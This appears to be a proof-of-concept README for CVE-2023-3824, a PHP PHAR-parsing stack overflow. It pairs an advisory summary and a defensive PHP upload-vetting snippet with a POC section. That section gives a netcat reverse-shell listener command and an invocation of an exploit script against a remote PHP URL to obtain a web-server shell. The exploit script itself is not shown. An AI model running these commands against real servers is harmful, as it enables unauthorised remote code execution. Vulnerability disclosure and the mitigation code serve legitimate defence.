
CVE-2023-3824 PoC — Buffer overflow and overread in phar_dir_read()

Associated Vulnerability
Title: Buffer overflow and overread in phar_dir_read() (CVE-2023-3824)
Description: In PHP versions 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading a phar file, insufficient length checking while reading PHAR directory entries may lead to a stack buffer overflow, potentially resulting in memory corruption or RCE.
Readme
# About


CVE-2023-3824 is a critical **remote code execution (RCE)** vulnerability in PHP, affecting versions 8.0.x (before 8.0.30), 8.1.x (before 8.1.22), and 8.2.x (before 8.2.8). The vulnerability arises from **insufficient length checking** when processing PHAR files (PHP's archive format), specifically when reading PHAR directory entries in the `Phar::loadPhar()` function.

## Exploitation Overview

- **Stack Buffer Overflow**: The vulnerability stems from improper bounds checking, which can lead to a **stack buffer overflow**. If an attacker crafts a malicious PHAR file with overly long filenames or directory entries, they can trigger this overflow.
- **Memory Corruption**: This overflow can cause memory corruption, which in turn may allow an attacker to execute arbitrary code on the server hosting the vulnerable PHP version.
- **Remote Code Execution**: Successful exploitation could grant the attacker the ability to execute arbitrary code remotely, effectively compromising the entire system.

## Exploit Example

The attack typically involves submitting a maliciously crafted PHAR file to a vulnerable PHP application. If the application processes untrusted PHAR files (e.g., through file uploads), an attacker could exploit this to run arbitrary code on the server.

A proof-of-concept (PoC) for this vulnerability shows how a carefully crafted PHAR file can trigger the overflow. While exploiting this vulnerability requires specific conditions (such as an application using PHAR files), the potential for RCE makes it a severe issue, especially for PHP-based web applications.

## Mitigation

- **Update PHP**: The primary fix is to update PHP to versions 8.0.30, 8.1.22, or 8.2.8, which include patches to address the vulnerability.
- **Avoid Untrusted PHAR Files**: As a general security measure, ensure your application avoids processing untrusted PHAR files.

This vulnerability has a high severity rating (CVSS 9.4) due to the potential for full system compromise. Keeping PHP updated is crucial to mitigate this risk.
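The two mitigation points above can be enforced in application code as well as by operations. The following PHP snippet is an added example written for this page, not code from the PoC repository or from PHP itself: it encodes the fixed releases the advisory lists (8.0.30, 8.1.22, 8.2.8) and checks the running interpreter against them, rejects uploads that look like PHAR archives before any code opens them, and unregisters the `phar://` stream wrapper so untrusted input cannot reach the PHAR parser through a wrapper path. All function and constant names are this example's own; the PHAR detection is a heuristic (extension list plus the `__HALT_COMPILER();` stub marker that phar-format archives must contain), so it is a defence-in-depth layer, not a substitute for the upgrade.

```php
<?php
declare(strict_types=1);

// Added defensive example (hypothetical names). Mirrors the advisory's
// mitigation advice: run a patched PHP and keep untrusted PHARs away from the
// PHAR parser.

/** First patched release per minor branch, as listed in the advisory. */
const CVE_2023_3824_FIXED = [
    '8.0' => '8.0.30',
    '8.1' => '8.1.22',
    '8.2' => '8.2.8',
];

/**
 * True when $version is at or past the patched release of its minor branch.
 * Branches the advisory does not list (e.g. 8.3) are treated as outside its
 * scope; an unparseable version string fails closed.
 */
function isPatchedForCve20233824(string $version = PHP_VERSION): bool
{
    $parts = explode('.', $version);
    if (count($parts) < 2) {
        return false;
    }
    $branch = $parts[0] . '.' . $parts[1];
    if (!isset(CVE_2023_3824_FIXED[$branch])) {
        return true;
    }
    // version_compare() orders suffixes such as "8.2.8RC1" before "8.2.8".
    return version_compare($version, CVE_2023_3824_FIXED[$branch], '>=');
}

/**
 * Heuristic: does an uploaded file look like a PHAR archive?
 * Checks the client-supplied name for phar extensions and scans up to
 * $maxScan bytes of the temp file for the mandatory __HALT_COMPILER stub
 * marker (phar-format archives). Unreadable files fail closed.
 */
function looksLikePhar(string $path, string $originalName, int $maxScan = 1048576): bool
{
    $lower = strtolower($originalName);
    foreach (['.phar', '.phar.gz', '.phar.bz2', '.phar.tar', '.phar.zip'] as $ext) {
        if (str_ends_with($lower, $ext)) {
            return true;
        }
    }
    $head = @file_get_contents($path, false, null, 0, $maxScan);
    if ($head === false) {
        return true;
    }
    // The token is case-insensitive in PHP, so compare case-insensitively.
    return stripos($head, '__HALT_COMPILER') !== false;
}

/**
 * Remove the phar:// wrapper for the rest of this request.
 * Returns true when the wrapper is absent afterwards.
 */
function disablePharWrapper(): bool
{
    if (in_array('phar', stream_get_wrappers(), true)) {
        stream_wrapper_unregister('phar');
    }
    return !in_array('phar', stream_get_wrappers(), true);
}

/**
 * Gate one entry of $_FILES. Returns null when the file may be processed
 * further, otherwise a reason string suitable for logging.
 */
function vetUpload(array $file): ?string
{
    if (!isPatchedForCve20233824()) {
        return 'interpreter ' . PHP_VERSION . ' predates the CVE-2023-3824 fix; refusing uploads';
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'upload failed with error code ' . ($file['error'] ?? 'unknown');
    }
    if (looksLikePhar($file['tmp_name'] ?? '', $file['name'] ?? '')) {
        return 'rejected: file looks like a PHAR archive';
    }
    return null;
}

disablePharWrapper();

// Typical use inside an upload handler:
// $reason = vetUpload($_FILES['upload'] ?? []);
// if ($reason !== null) { error_log($reason); http_response_code(400); exit; }
```

The version check fails closed on an unpatched interpreter because any code path that later feeds an uploaded file to the PHAR parser is the exact condition the advisory describes; the wrapper removal closes the separate route where a `phar://` path reaches that parser indirectly. Neither check makes a vulnerable interpreter safe; they only shrink the attack surface until the upgrade is applied.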

# POC

Run reverse shell listener:

```bash
nc -l local_port
```

Then run POC:

```bash
bash cve-2023-3824.sh remote_url local_ip local_port
```

* _remote_url_ is the vulnerable remote PHP script, e.g. `https://wp.example.com/form-uploader.php`
* _local_ip_ is the attacker machine's IP
* _local_port_ is the attacker machine's listening port

If the exploit succeeds, you get a shell running with the web server's (apache, nginx) permissions.

---

```text


                                                        .--,-``-.             
                                             ,---,     /   /     '.           
  ,---,                                    ,--.' |    / ../        ;          
,---.'|                                    |  |  :    \ ``\  .`-    '  __  ,-.
|   | :                           .--.--.  :  :  :     \___\/   \   :,' ,'/ /|
:   : :      ,--.--.     ,---.   /  /    ' :  |  |,--.      \   :   |'  | |' |
:     |,-.  /       \   /     \ |  :  /`./ |  :  '   |      /  /   / |  |   ,'
|   : '  | .--.  .-. | /    /  ||  :  ;_   |  |   /' :      \  \   \ '  :  /  
|   |  / :  \__\/: . ..    ' / | \  \    `.'  :  | | |  ___ /   :   ||  | '   
'   : |: |  ," .--.; |'   ;   /|  `----.   \  |  ' | : /   /\   /   :;  : |   
|   | '/ : /  /  ,.  |'   |  / | /  /`--'  /  :  :_:,'/ ,,/  ',-    .|  , ;   
|   :    |;  :   .'   \   :    |'--'.     /|  | ,'    \ ''\        ;  ---'    
/    \  / |  ,     .-./\   \  /   `--'---' `--''       \   \     .'           
`-'----'   `--`---'     `----'                          `--`-,,-'             
```

---
inspired by ::PerfectForms::